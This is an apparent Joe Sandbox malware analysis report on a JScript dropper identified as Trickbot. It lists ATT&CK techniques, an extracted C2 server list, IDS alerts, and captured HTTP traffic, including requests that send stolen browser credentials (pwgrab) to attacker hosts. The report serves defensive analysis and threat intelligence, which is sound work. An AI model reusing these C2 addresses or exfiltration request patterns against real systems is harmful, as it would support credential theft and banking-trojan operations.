
Analysis Report Monet.jse

Overview

General Information

Joe Sandbox Version: 28.0.0
Analysis ID: 93925
Start date: 20.01.2020
Start time: 14:10:45
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 18m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Monet.jse
Cookbook file name: default.jbs
Analysis system description: Native physical machine for testing VM-aware malware (Office 2010 v14.0.6029, Java 1.8.0_65, Flash 20.0.0.267, Acrobat Reader 11.0.18, Internet Explorer 11, Chrome 55, Firefox 47)
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winJSE@20/7@4/8
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 94%
  • Number of executed functions: 125
  • Number of non-executed functions: 118
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .jse
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, igfxsrvc.exe, WmiPrvSE.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 8.248.119.254, 8.253.95.121, 8.248.129.254, 8.248.141.254, 8.248.131.254, 67.26.81.254, 8.253.95.120, 67.26.83.254, 8.253.95.249, 8.253.95.98, 8.248.121.254, 67.26.75.254, 8.253.207.108, 67.26.73.254, 8.248.125.254, 93.184.221.240, 205.185.216.10, 205.185.216.42
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | Report FP / FN | false | Trickbot | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false | Confidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

The matrix is listed here by tactic (one column of the original matrix per line). Numbers in parentheses are the counts shown in the report's matrix cells; techniques without a number are the unmarked cells of the matrix.

Initial Access: Valid Accounts (1), Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise, Trusted Relationship, Hardware Additions, Masquerade as Legitimate Application
Execution: Windows Management Instrumentation (21), Scripting (21), Execution through API (131), Exploitation for Client Execution (1), Command-Line Interface (2), Graphical User Interface, Scripting, Third-party Software, Rundll32, PowerShell, Execution through API, Regsvr32
Persistence: Valid Accounts (1), Application Shimming (1), Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking, Change Default File Association, File System Permissions Weakness, New Service
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (11), Process Injection (32), Application Shimming (1), File System Permissions Weakness, New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness, Exploitation for Privilege Escalation, Valid Accounts, Bypass User Account Control
Defense Evasion: Disabling Security Tools (1), Deobfuscate/Decode Files or Information (1), Scripting (21), File Deletion (1), Obfuscated Files or Information (2), Masquerading (1), Valid Accounts (1), Modify Registry (1), Virtualization/Sandbox Evasion (3), Access Token Manipulation (11), Process Injection (32), DLL Side-Loading (1)
Credential Access: Credential Dumping (2), Credentials in Files (1), Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt, Keychain, Private Keys, Securityd Memory
Discovery: System Time Discovery (2), Security Software Discovery (5), File and Directory Discovery (4), System Information Discovery (35), Query Registry (1), Virtualization/Sandbox Evasion (3), Process Discovery (3), Application Window Discovery (11), Remote System Discovery (1), System Network Configuration Discovery (11), Security Software Discovery, Permission Groups Discovery
Lateral Movement: Remote File Copy (3), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares, Taint Shared Content, Replication Through Removable Media, Pass the Ticket
Collection: Data from Local System (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data, Automated Collection, Audio Capture, Video Capture, Man in the Browser
Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium, Commonly Used Port, Standard Application Layer Protocol, Alternate Network Mediums
Command and Control: Uncommonly Used Port (11), Remote File Copy (3), Standard Cryptographic Protocol (21), Standard Non-Application Layer Protocol (3), Standard Application Layer Protocol (14), Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption, Connection Proxy, Communication Through Removable Media, Custom Command and Control Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact, Disk Structure Wipe, Disk Content Wipe

Signature Overview

AV Detection:

Found malware configuration
Source: svchost.exe.284.18.memstr | Malware Configuration Extractor: Trickbot {"C2 list": ["181.196.207.202:449", "82.146.62.520:443", "8.91.10.8:443", "129.134.18.23:449", "186.232.91.240:449", "5.182.210.226:443", "85.204.116.128:443", "185.62.188.34:443", "79.143.31.246:443", "93.189.46.122:443", "31.184.254.50:443", "195.123.217.226:443", "185.99.2.117:443", "104.168.96.113:443", "188.165.62.36:443", "5.182.210.246:443", "185.142.99.8:443", "185.252.144.135:443", "82.146.62.52:443", "212.109.220.111:443", "91.235.129.25:443", "5.182.210.109:443", "190.214.13.2:449", "181.140.173.186:449", "181.129.104.139:449", "181.113.28.146:449", "181.112.157.42:449", "170.84.78.224:449", "200.21.51.38:449", "46.174.235.36:449", "36.89.85.103:449", "181.129.134.18:449", "186.71.150.23:449", "131.161.253.190:449", "200.127.121.99:449", "114.8.133.71:449", "119.252.165.75:449", "121.100.19.18:449", "202.29.215.114:449", "180.180.216.177:449", "171.100.142.238:449"], "modules": ["networkDll", "pwgrab", "mcconf", "systeminfo"]}
Yara detected Trickbot
Source: Yara match | File source: 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 284, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00065980 CryptAcquireContextW,14_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00065980 CryptAcquireContextW,18_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0007C2F0 CryptAcquireContextW,18_2_0007C2F0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00065980 CryptAcquireContextW,21_2_00065980
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_0007C2F0 CryptAcquireContextW,21_2_0007C2F0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008E1F4 CryptUnprotectData,wnsprintfA,wnsprintfA,36_2_000000018008E1F4
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180096408 CryptUnprotectData,LocalFree,36_2_0000000180096408
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008C580 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_000000018008C580
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800966D0 RegQueryValueExW,VirtualAlloc,RegQueryValueExW,VirtualFree,lstrlenW,CryptUnprotectData,LocalFree,VirtualFree,36_2_00000001800966D0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800968A0 StrCpyNW,StrCatW,lstrlenW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,wnsprintfW,StrCmpW,36_2_00000001800968A0
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018008D428 CryptUnprotectData,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_000000018008D428
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000000180093798 CryptUnprotectData,36_2_0000000180093798
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_000000018009790C CryptUnprotectData,LocalFree,_invalid_parameter_noinfo_noreturn,36_2_000000018009790C

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_00061180 FindFirstFileW,FindNextFileW,FindClose,14_2_00061180
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_0006BD80 FindFirstFileW,FindNextFileW,18_2_0006BD80
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_00061180 FindFirstFileW,FindNextFileW,FindClose,18_2_00061180
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000782C0 FindFirstFileW,FindNextFileW,18_2_000782C0
Source: C:\Windows\System32\svchost.exe | Code function: 21_2_00061180 FindFirstFileW,FindNextFileW,FindClose,21_2_00061180
Enumerates the file system
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\taskschd.dll
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\Wireless\CrashDumps\
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\bcryptprimitives.dll
Source: C:\Windows\System32\svchost.exe | File opened: C:\Windows\system32\config\systemprofile\AppData\Roaming\Intel\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.0.40:49187 -> 181.129.104.139:449
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.0.40:49189 -> 5.2.78.43:443
Source: Traffic | Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 185.62.189.249:447 -> 192.168.0.40:49193
Source: Traffic | Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.0.40:49203 -> 203.176.135.102:8082
May check the online IP address of the machine
Source: unknown | DNS query: name: api.ipify.org (this entry is repeated 6 times in the report)
Uses known network protocols on non-standard ports
Source: unknown | Network traffic detected: HTTP traffic on port 49203 -> 8082
Source: unknown | Network traffic detected: HTTP traffic on port 8082 -> 49203
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.0.40:49187 -> 181.129.104.139:449
Source: global traffic | TCP traffic: 192.168.0.40:49193 -> 185.62.189.249:447
Source: global traffic | TCP traffic: 192.168.0.40:49203 -> 203.176.135.102:8082
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36 | Accept-Language: de-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: 185.195.237.14 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/ HTTP/1.1 | Accept: */* | Content-Type: multipart/form-data; boundary=---------CVWRWQYCSROXPZEU | Connection: Close | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) | Host: 203.176.135.102:8082 | Content-Length: 301 | Cache-Control: no-cache
Connects to IPs without corresponding DNS lookups
Source: unknown | TCP traffic detected without corresponding DNS query: 185.195.237.14 (this entry is repeated 50 times in the report)
Contains functionality to download additional files from the internet
Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000001800796DC InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,GetLastError,InternetQueryOptionA,GetLastError,InternetSetOptionA,GetLastError,HttpSendRequestExA,GetLastError,InternetWriteFile,GetLastError,HttpEndRequestA,GetLastError,StrToIntExA,StrToIntExA,StrToIntExA,StrToIntExA,InternetQueryDataAvailable,InternetReadFile,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,InternetCrackUrlA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,36_2_00000001800796DC
Downloads files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SBAZIX4A\Bx6ECqoJ2[1].txt
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /?format=text HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/spk/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/0/Windows%207%20x64%20SP1/1083/84.17.52.62/217C05512A13BF0D1975043DC440D43A0AD4D5BF9D7809375E0491B975D5B4A3/nfYREqCrC5seZ7lm5k4Fqwmud/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/user/SYSTEM/0/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/10/62/GDFUKAPEGYZAQTQ/1/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/1/P9VEk5oK3B7qmh1wSz/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/ HTTP/1.1 | Connection: Keep-Alive | User-Agent: curl/7.67.0 | Host: 5.2.78.43
Source: global traffic | HTTP traffic detected: GET /21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711 HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.10.3945.88 Safari/537.36 | Accept-Language: de-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: 185.195.237.14 | Connection: Keep-Alive
Found strings which match to known social media urls
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=------Boundary019ABD5D | User-Agent: curl/7.67.0 | Content-Length: 141 | Host: 5.2.78.43
Urls found in memory or binary data
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://103.84.238.3:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://103.94.122.254:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://103.94.122.254:8082lt
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://112.78.164.34:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://112.78.164.34:8082Vault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://164.68.96.155:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://164.68.96.155:443m
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://170.238.117.187:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://170.238.117.187:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://177.74.232.124:80
Source: wscript.exe, 00000000.00000002.55142443043.0000000002306000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.55143016342.0000000003E80000.00000004.00000001.sdmp | String found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711
Source: wscript.exe, 00000000.00000002.55143060181.0000000003EA6000.00000004.00000001.sdmp | String found in binary or memory: http://185.195.237.14/21RWq/jucE4.php?zs=s20&ed=431846743&rnx=4723711bin
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://185.99.2.137:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://185.99.2.185:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://188.165.62.29:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://188.165.62.2:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://190.100.16.210:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://190.119.180.226:8082
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://195.123.216.95:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://195.123.219.93:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://195.123.219.93:443x
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://203.176.135.102:8082
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmp | String found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/
Source: svchost.exe, 00000024.00000002.56181457184.0000000000269000.00000004.00000020.sdmp | String found in binary or memory: http://203.176.135.102:8082/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/83/-4B97C760B13D
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://203.176.135.102:8082ault
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://36.89.10
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://36.89.106.69:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://5.2.64.188:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://5.2.78.191:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://51.89.115.110:443
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://96.9.73.73:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://96.9.77.142:80
Source: svchost.exe, 00000024.00000002.56181394267.000000000022D000.00000004.00000020.sdmp | String found in binary or memory: http://96.:80
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: svchost.exe, 00000012.00000002.56178566267.000000000037E000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
Source: svchost.exe, 00000012.00000002.56178609261.00000000003A7000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en1)
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Login Data.bak.36.dr | String found in binary or memory: http://www.google.com/favicon.ico
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp | String found in binary or memory: https://185.62.189.249:447/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/pwgrab64/
Source: svchost.exe, 00000012.00000003.56114318007.00000000003F7000.00000004.00000001.sdmp | String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/5/dpost/
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp | String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DEBG/browser/
Source: svchost.exe, 00000012.00000002.56180117106.0000000002148000.00000004.00000001.sdmp | String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/DPST/browser/8s
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: https://5.2.78.43/red4/141700_W617601.8B806DE991D43AE26D6F91E8AD26588D/64/pwgrab/VERS/browser/:
Source: Login Data.bak.36.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search?ei=
Source: Login Data.bak.36.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: svchost.exe, 00000012.00000002.56178696939.00000000003F7000.00000004.00000020.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49201
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown | Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49209 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49197 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49199
Source: unknown | Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49197
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown | Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown | Network traffic detected: HTTP traffic on port 49201 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown | Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown | Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49194 -> 443
